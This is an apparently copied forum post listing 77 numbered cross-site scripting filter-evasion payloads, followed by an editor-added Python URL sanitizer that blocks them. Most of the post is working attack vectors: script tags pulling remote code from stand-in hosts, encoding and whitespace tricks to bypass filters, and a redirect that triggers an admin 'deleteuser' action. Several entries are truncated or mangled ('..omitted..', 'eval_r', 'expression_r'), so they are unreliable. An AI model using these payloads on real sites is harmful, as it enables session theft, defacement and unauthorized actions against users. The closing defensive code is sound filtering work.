It seems t00ls has relatively little material on XSS, so I saw something good and copied it over, in case any classmates need it for reference.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
(17) Null character
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters basically have no effect domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50) Anonymous tag with STYLE (made up of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside the Flash file, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js">
</SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot for absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
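Most of the URL-attribute vectors above (items 3 to 19 in particular) get past filters that look for the literal string "javascript:" by varying case, inserting a tab, newline, carriage return or null byte, adding leading whitespace or Unicode spaces (the character set item 47 lists), or HTML-encoding the scheme with or without semicolons. The check below is an added example from the editor, not part of the original post or the cheat sheet it copies: it normalizes a user-supplied URL the way a browser's attribute parser effectively does before the value goes into SRC, HREF or BACKGROUND, then accepts only an allow-list of schemes. The function names and the ALLOWED_SCHEMES policy are this example's own assumptions.

```python
import html
import re
import unicodedata
from typing import Optional

# Allow-list of schemes a user-supplied URL may carry when it ends up in an
# SRC, HREF or BACKGROUND attribute. Everything else (javascript:, vbscript:,
# data:, ...) is rejected. Hypothetical policy chosen for this example.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Characters to drop before inspecting the scheme: C0 controls and space
# (1-32), DEL, no-break space (160) and the BOM (65279). The URL standard
# strips tab/newline/CR anywhere in a URL; NUL is dropped too so that a
# 'java\0script:' payload cannot slip through. Unicode spaces 8192-8202 and
# 12288 are folded to a plain space by NFKC first, so the same range catches them.
_CONTROL_RE = re.compile(r"[\x00-\x20\x7f\xa0\ufeff]")

def normalize_url(value: str) -> str:
    """Undo the evasions a browser would undo before it reads the scheme."""
    # Decode HTML character references twice: html.unescape accepts numeric
    # references with or without the trailing ';' (like a browser), and the
    # second pass catches '&amp;#106;'-style double encoding.
    decoded = html.unescape(html.unescape(value))
    # Fold fullwidth letters and Unicode spaces to their ASCII equivalents.
    folded = unicodedata.normalize("NFKC", decoded)
    # Remove embedded control characters and whitespace, then case-fold.
    return _CONTROL_RE.sub("", folded).lower()

def url_scheme(value: str) -> Optional[str]:
    """Scheme of the normalized URL (RFC 3986 syntax), or None if it is relative."""
    match = re.match(r"^([a-z][a-z0-9+.-]*):", normalize_url(value))
    return match.group(1) if match else None

def is_safe_url_attribute(value: str) -> bool:
    """True only for relative URLs and allow-listed schemes."""
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES

if __name__ == "__main__":
    # Constructed inputs mirroring the evasions listed on this page.
    for sample in ["http://example.com/a.png", "JaVaScRiPt:alert('XSS')",
                   "jav\tascript:alert('XSS')", " javascript:alert('XSS')",
                   "java\0script:alert('XSS')", "&#106;avascript:alert('XSS')"]:
        verdict = "allowed" if is_safe_url_attribute(sample) else "blocked"
        print(repr(sample), "->", verdict)
```

Note that a host written with a port but no scheme (www.example.com:8080/x) parses as scheme "www.example.com" under RFC 3986 and is therefore rejected; that is the conservative outcome for an allow-list.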
Original source: http://fuzzexp.org/u/0day/?p=14